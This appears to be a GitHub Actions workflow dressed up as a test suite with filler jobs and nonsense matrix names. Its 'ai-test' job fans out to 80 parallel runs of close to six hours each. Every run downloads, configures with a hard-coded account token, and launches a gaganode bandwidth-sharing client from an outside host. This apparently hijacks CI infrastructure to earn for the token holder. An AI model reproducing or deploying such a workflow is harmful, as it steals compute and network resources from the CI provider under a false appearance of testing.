name: repi
on: [push]
    
env:
  RUBY_VERSION: '2.6'
      
jobs:
  mdtest:
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        test: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6]
        flag: [A, B, C, Ui]
    timeout-minutes: 360
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        sudo apt update -y && sleep 5
        
  mat:
    needs: [mdtest]
    runs-on: windows-latest
    continue-on-error: true
    strategy:
      max-parallel: 256
      fail-fast: false
      matrix:
         acio: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18]
         flag: [kmn, oiu, qwe, ruw, mou, hoa, shp, 5ey, 8ko, n9f]  
    timeout-minutes: 355
    steps:
    - uses: actions/checkout@v2
    - name: ai-test
      run: |
        curl -o app-linux-amd64.tar.gz https://assets.coreservice.io/public/package/29/gaganode/1.0.4/gaganode-1_0_4.tar.gz && tar -zxf app-linux-amd64.tar.gz
        cd gaganode-linux-amd64 && ./gaganode config set --token=obqbmxayydohqrhc9a977e15c9875e03
        ./gaganode
